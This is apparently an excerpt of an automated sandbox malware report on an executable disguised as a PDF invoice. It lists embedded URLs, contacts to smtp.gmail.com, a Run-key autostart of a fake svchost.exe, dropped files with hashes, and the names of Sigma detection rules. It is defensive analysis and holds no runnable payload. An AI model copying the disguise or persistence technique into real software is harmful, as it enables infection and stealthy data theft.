http://www.cl.cam.ac.uk/~mgk25/iso-time.html0%URL Reputationsafe
http://pki.goog/gsr1/gsr1.crtloc0%Avira URL Cloudsafe
https://pki.goog/repository/00%URL Reputationsafe
http://crls.pki.goog/gts1c3/moVDfISia2k.crlc0%Avira URL Cloudsafe
http://crl.pki.goog/gtsr1/gtsr1.crl0%Avira URL Cloudsafe
http://crls.pki.goog/gts1c3/moVDfISia2k.crla0%Avira URL Cloudsafe
https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
http://crl.p0%Avira URL Cloudsafe
http://crl.pki.goog/gtsr1/gtsr1.crlXx0%Avira URL Cloudsafe
https://www.tiktok.c0%Avira URL Cloudsafe
https://disneyplus.com/legal.0%URL Reputationsafe
http://crl.pki.goog/gtsr1/gtsr1.crl:0%Avira URL Cloudsafe
http://pki.goog/repo/certs/gts1c3.dery10%Avira URL Cloudsafe
http://crl.pki.goog/gtsr1/gtsr1.crlACE0%Avira URL Cloudsafe
http://crl.pki.goog/gsr1/gsr1.crle0%Avira URL Cloudsafe
http://help.disneyplus.com.0%URL Reputationsafe
http://pki.goog/repo/certs/gts1c3.der00%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
smtp.gmail.com
142.250.145.108
truefalse
    		high

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://crl.pki.goog/gsr1/gsr1.crldnCab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://pki.goog/gsr1/gsr1.crtCab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://crl.pki.goog/gsr1/gsr1.crl0;Cab_Invoice_pdf.exe, 00000003.00000002.563492402.000000000305D000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://crls.pki.goog/gts1c3/moVDfISia2k.crl(Cab_Invoice_pdf.exe, 00000003.00000002.563409089.000000000303B000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://pki.goog/repo/certs/gts1c3.derB2Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://crls.pki.goog/gts1c3/moVDfISia2k.crl0Cab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563492402.000000000305D000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.565635823.0000000003357000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://github.com/mhammond/pywin32Cab_Invoice_pdf.exe, 00000003.00000002.569019026.000000006F31E000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.567155238.000000006EB1A000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.567064488.000000006EAEB000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.568756682.000000006F2D8000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.467080000.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.464053217.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.459130908.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.465540156.0000000000E1B000.00000004.00000001.sdmpfalse
      		high
      http://crl.pki.goog/gsr1/gsr1.crlCab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://pki.goog/repo/certs/gtsr1.der81Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://pki.goog/repo/certs/gts1c3.derCab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://pki.goog/repo/certs/gtsr1.derv2Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://crl.pki.goog/gtsr1/gtsr1.crlRCab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://pki.goog/gsr1/gsr1.crteCab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://pki.goog/repo/certs/gtsr1.derCab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://crls.pki.goog/gts1c3/moVDfISia2k.crl#Cab_Invoice_pdf.exe, 00000003.00000002.563409089.000000000303B000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://crl.pki.goog/gtsr1/gtsr1.crlTCab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.python.org/download/releases/2.3/mro/.Cab_Invoice_pdf.exe, 00000003.00000003.324419871.0000000000EC7000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.562792705.0000000002D90000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.470092422.0000000002900000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.493118134.0000000003500000.00000004.00000001.sdmpfalse
        		high
        http://pki.goog/repo/certs/gtsr1.der$Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://pki.goog/repo/certs/gtsr1.der04Cab_Invoice_pdf.exe, 00000003.00000002.563492402.000000000305D000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6Cab_Invoice_pdf.exe, 00000003.00000003.329270034.000000000301F000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563150895.0000000002FF4000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.329242201.0000000002FF9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.475545199.000000000107C000.00000004.00000001.sdmpfalse
          		high
          http://crl.thawte.com/ThawteTimestampingCA.crl0svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmpfalse
            		high
            http://crl.pki.goog/gtsr1/gtsr1.crlbCab_Invoice_pdf.exe, 00000003.00000002.563409089.000000000303B000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://crl.pki.goog/gtsr1/gtsr1.crldCab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.iana.org/time-zones/repository/tz-link.htmlCab_Invoice_pdf.exe, 00000003.00000003.327450088.0000000002FD1000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.327365430.0000000000EE5000.00000004.00000001.sdmpfalse
              		high
              https://github.com/BoboTiG/python-mssCab_Invoice_pdf.exe, 00000003.00000002.565049121.00000000031C0000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563024174.0000000002F90000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.481183510.00000000036C0000.00000004.00000001.sdmpfalse
                		high
                http://www.python.org/dev/peps/pep-0205/Cab_Invoice_pdf.exe, 00000003.00000003.327138689.0000000000EA7000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.562961812.0000000002F40000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.470092422.0000000002900000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.493118134.0000000003500000.00000004.00000001.sdmpfalse
                  		high
                  https://support.google.com/mail/?p=BadCredentialsCab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
                    		high
                    http://python.org/dev/peps/pep-0263/svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmpfalse
                      		high
                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 0000000C.00000003.389695797.0000020D18381000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.389793962.0000020D183A2000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crls.pki.goog/gts1c3/moVDfISia2k.crlrCab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://ocsp.thawte.com0svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://pki.goog/repo/certs/gts1c3.dere2Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.ver)svchost.exe, 0000000C.00000002.410422151.0000020D17AE9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://crls.pki.goog/gts1c3/moVDfISia2k.crlCab_Invoice_pdf.exe, 00000003.00000002.563859154.00000000030A5000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.pki.goog/gtsr1/gtsr1.crl0WCab_Invoice_pdf.exe, 00000003.00000002.563492402.000000000305D000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000000C.00000003.391558399.0000020D1839A000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.391525038.0000020D183B1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.391498040.0000020D183B1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.391546190.0000020D18389000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.391580111.0000020D18802000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://pki.goog/gsr1/gsr1.crt02Cab_Invoice_pdf.exe, 00000003.00000002.563492402.000000000305D000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlCab_Invoice_pdf.exe, 00000003.00000003.327450088.0000000002FD1000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.327365430.0000000000EE5000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563024174.0000000002F90000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://pki.goog/gsr1/gsr1.crtlocCab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://pki.goog/repository/0Cab_Invoice_pdf.exe, 00000003.00000002.563492402.000000000305D000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crls.pki.goog/gts1c3/moVDfISia2k.crlcCab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.pki.goog/gtsr1/gtsr1.crlCab_Invoice_pdf.exe, 00000003.00000002.563409089.000000000303B000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563859154.00000000030A5000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crls.pki.goog/gts1c3/moVDfISia2k.crlaCab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 0000000C.00000003.389695797.0000020D18381000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.389793962.0000020D183A2000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.pCab_Invoice_pdf.exe, 00000003.00000002.563859154.00000000030A5000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.pki.goog/gtsr1/gtsr1.crlXxCab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.tiktok.csvchost.exe, 0000000C.00000003.391546190.0000020D18389000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.openssl.org/HCab_Invoice_pdf.exe, 00000003.00000002.567452427.000000006EBF1000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.568654900.000000006EE48000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.449203486.0000000002C0C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.482937530.000000000380C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpfalse
                        		high
                        https://disneyplus.com/legal.svchost.exe, 0000000C.00000003.389695797.0000020D18381000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.389793962.0000020D183A2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.pki.goog/gtsr1/gtsr1.crl:Cab_Invoice_pdf.exe, 00000003.00000002.563409089.000000000303B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pki.goog/repo/certs/gts1c3.dery1Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.pki.goog/gtsr1/gtsr1.crlACECab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmCab_Invoice_pdf.exe, 00000003.00000002.562902379.0000000002F00000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.327450088.0000000002FD1000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.327365430.0000000000EE5000.00000004.00000001.sdmpfalse
                          		high
                          http://crl.pki.goog/gsr1/gsr1.crleCab_Invoice_pdf.exe, 00000003.00000002.563409089.000000000303B000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://help.disneyplus.com.svchost.exe, 0000000C.00000003.389695797.0000020D18381000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.389793962.0000020D183A2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://pki.goog/repo/certs/gts1c3.der0Cab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.565635823.0000000003357000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          142.250.145.109
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          142.250.145.108
                          		smtp.gmail.comUnited States
                          		15169GOOGLEUSfalse

                          Private

                          IP
                          192.168.2.1
                          127.0.0.1

                          General Information

                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:534002
                          Start date:04.12.2021
                          Start time:23:20:31
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 14m 15s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:Cab_Invoice_pdf.bin (renamed file extension from bin to exe)
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:26
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal72.evad.winEXE@19/204@7/4
                          EGA Information:
                          • Successful, ratio: 80%
                          HDC Information:
                          • Successful, ratio: 28.3% (good quality ratio 22.6%)
                          • Quality average: 58.9%
                          • Quality standard deviation: 39.1%
                          HCA Information:
                          • Successful, ratio: 64%
                          • Number of executed functions: 117
                          • Number of non-executed functions: 359
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                          • Excluded IPs from analysis (whitelisted): 20.54.110.249, 52.251.79.25, 23.35.236.56
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, tile-service.weather.microsoft.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                          • Execution Graph export aborted for target svchost.exe, PID 6128 because there are no executed function
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          Errors:
                          • Sigma runtime error: Invalid condition: all of selection* Rule: Conti Backup Database
                          • Sigma runtime error: Invalid condition: all of selection* Rule: Stop Or Remove Antivirus Service
                          • Sigma runtime error: Invalid condition: all of selection* Rule: Conti Volume Shadow Listing
                          • Sigma runtime error: Invalid condition: all of selection* Rule: Compress Data and Lock With Password for Exfiltration With 7-ZIP
                          • Sigma runtime error: Invalid condition: all of selection* Rule: Disable or Delete Windows Eventlog
                          • Sigma runtime error: Invalid condition: all of selection* Rule: PowerShell SAM Copy
                          • Sigma runtime error: Invalid condition: all of selection* Rule: Compress Data and Lock With Password for Exfiltration With WINZIP

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          23:22:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
                          23:22:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
                          23:22:15API Interceptor9x Sleep call for process: svchost.exe modified

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASN

                          No context

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\ProgramData\Microsoft\Network\Downloader\edb.log
                          Process:C:\Windows\System32\svchost.exe
                          File Type:MPEG-4 LOAS
                          Category:dropped
                          Size (bytes):1310720
                          Entropy (8bit):0.24860213207435874
                          Encrypted:false
                          SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU40:BJiRdwfu2SRU40
                          MD5:E7964A90D4F58CDF9FC8CD8F170E1392
                          SHA1:54B22245F232A23D7E4C3477612663F9D6AF0B9D
                          SHA-256:9C568A166DC1C5458C8D7009771B99302696371A335DA52DEF494099C7FBC162
                          SHA-512:FA48F415C8FEE1BD7FED538C5FF770484170A8DE5912EECEE01CBFDE46CE96ECD9586525510B99B312C7EA36B3A71AA75A2F271CA8711685FC2FCAB887A65AE3
                          Malicious:false
                          Reputation:unknown
                          Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                          Process:C:\Windows\System32\svchost.exe
                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0f1d7f0c, page size 16384, DirtyShutdown, Windows version 10.0
                          Category:dropped
                          Size (bytes):786432
                          Entropy (8bit):0.25069101930815285
                          Encrypted:false
                          SSDEEP:384:k+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:bSB2nSB2RSjlK/+mLesOj1J2
                          MD5:D8E0DFC4DCD06173CFC99DCC81026127
                          SHA1:8194240D2EB4D7B7991E9FD45208E0BCBAB75408
                          SHA-256:BA8B4868624CDDF07192E3EE65084F3B358D3A3A6A50FC6CEE4286E2A513898F
                          SHA-512:54702C8A0ED3E87925FD0E4423C6AE1BFA3A2B36ED28695A2952AD7F8871B1B9F0BDE820E85B6CFF6A99613313D788211B2323D5D15851BA6BBF072585DDAD0F
                          Malicious:false
                          Reputation:unknown
                          Preview: ....... ................e.f.3...w........................&..........w.......ym.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w..............................................................................................................................................................................................................................................y.w.................6.@.....ym.........................................................................................................................................................................................................................................................................................................................................................................................
                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):16384
                          Entropy (8bit):0.07651195511846151
                          Encrypted:false
                          SSDEEP:3:9ELEvqmyiAl/bJdAtilsYoll3Vkttlmlnl:CyqDiAt473
                          MD5:451B32E663E5A366403C367ED08AA1ED
                          SHA1:1876CD992217A285F5CA329F8AB6564E763C732F
                          SHA-256:F44162197089E4A079F0E48B15F11D664B5455D6674BA4FF4F13DA5D496EF57C
                          SHA-512:1CA7880D20DB23D904077ADFF4844D4CB98A74C469284DCBE1BEC1549BED3ACBE51FB2CCF89DE32013B34BFAC8A6758FA9A8E65B70A8534FA12B6629224D4C45
                          Malicious:false
                          Reputation:unknown
                          Preview: .np......................................3...w.......ym......w...............w.......w....:O.....w...................6.@.....ym.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\4y2igpme
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):2.0
                          Encrypted:false
                          SSDEEP:3:qn:qn
                          MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                          SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                          SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                          SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                          Malicious:false
                          Reputation:unknown
                          Preview: blat
                          C:\Users\user\AppData\Local\Temp\_MEI24122\Include\pyconfig.h
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:C source, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):21096
                          Entropy (8bit):5.30196060437062
                          Encrypted:false
                          SSDEEP:384:rG3tApdkHRMYURIn1/8BsRV4ig8as8Ji2MgsdgTaXgDV:rG3tApWySE+aPfZXvV
                          MD5:31FEF4BD7506D25D27BF596F949A2066
                          SHA1:41F1D3A07B331220DAEA0B106D29D2A2DB74B45E
                          SHA-256:12347EF4F8CA786D33CAC569DDF61ACBDC506F986D1AA34F3BAAD8C062543DD3
                          SHA-512:062A1EF84DB04D91810CF81604A23E5226326E0BAD0B66077A22D05AC3EF6A06B36EFEBC0552FE2C0FAA17221275E95E77D11B952A29B6D3C3DB144622336B77
                          Malicious:false
                          Reputation:unknown
                          Preview: #ifndef Py_CONFIG_H..#define Py_CONFIG_H..../* pyconfig.h. NOT Generated automatically by configure.....This is a manually maintained version used for the Watcom,..Borland and Microsoft Visual C++ compilers. It is a..standard part of the Python distribution.....WINDOWS DEFINES:..The code specific to Windows should be wrapped around one of..the following #defines....MS_WIN64 - Code specific to the MS Win64 API..MS_WIN32 - Code specific to the MS Win32 (and Win64) API (obsolete, this covers all supported APIs)..MS_WINDOWS - Code specific to Windows, but all versions...Py_ENABLE_SHARED - Code if the Python core is built as a DLL.....Also note that neither "_M_IX86" or "_MSC_VER" should be used for..any purpose other than "Windows Intel x86 specific" and "Microsoft..compiler specific". Therefore, these should be very rare.......NOTE: The following symbols are deprecated:..NT, USE_DL_EXPORT, USE_DL_IMPORT, DL_EXPORT, DL_IMPORT..MS_CORE_DLL.....WIN32 is still required for the locale modul
                          C:\Users\user\AppData\Local\Temp\_MEI24122\VCRUNTIME140.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):76168
                          Entropy (8bit):6.781149490150774
                          Encrypted:false
                          SSDEEP:1536:zgTqURG2vo0RwvI7sjBH+cOKXc36r23oEecbi0mju:zdURhvZ6vIQVrPypecbi0m
                          MD5:87DD91C56BE82866BF96EF1666F30A99
                          SHA1:3B78CB150110166DED8EA51FBDE8EA506F72AEAF
                          SHA-256:49B0FD1751342C253CAC588DDA82EC08E4EF43CEBC5A9D80DEB7928109B90C4F
                          SHA-512:58C3EC6761624D14C7C897D8D0842DBEAB200D445B4339905DAC8A3635D174CDFB7B237D338D2829BC6C602C47503120AF5BE0C7DE6ABF2E71C81726285E44D6
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ix..-...-...-....|./...$a..&...-.......h..>...h..8...h..1...h..,...hl.,...h..,...Rich-...................PE..L....._.........."!.........................................................@......{.....@A......................................... ...................#...0..x....#..8............................#..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc........ ......................@..@.reloc..x....0......................@..B........................................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\_asyncio.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):57520
                          Entropy (8bit):6.4179566473980465
                          Encrypted:false
                          SSDEEP:1536:0iULU9Lbx5udbmDoOTXPnbhyBDmuo2iwBIuYncjNayr:0i4MLLbhamuo2iwBIuYncj3
                          MD5:54414D216C4DEA54799DC0F5CE657FBE
                          SHA1:0043CFCAE73985C7739ABDF6DBB0E4291EFDB5D2
                          SHA-256:CEF9A3D83E7CC45D99D666A6F8E7E58CC68ACB14E8858FE5BC6ED54A0F7C3898
                          SHA-512:F3CB7C8D38E59EB8F9A1CF693AD032FD560B4CCCB604B11C1BAE837FE045591C969A7E1EDF35F1BA9546EEF0E3C5D0D70188393B3C656B91ED95736AFC8A5358
                          Malicious:false
                          Antivirus:
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          • Antivirus: ReversingLabs, Detection: 0%
                          Reputation:unknown
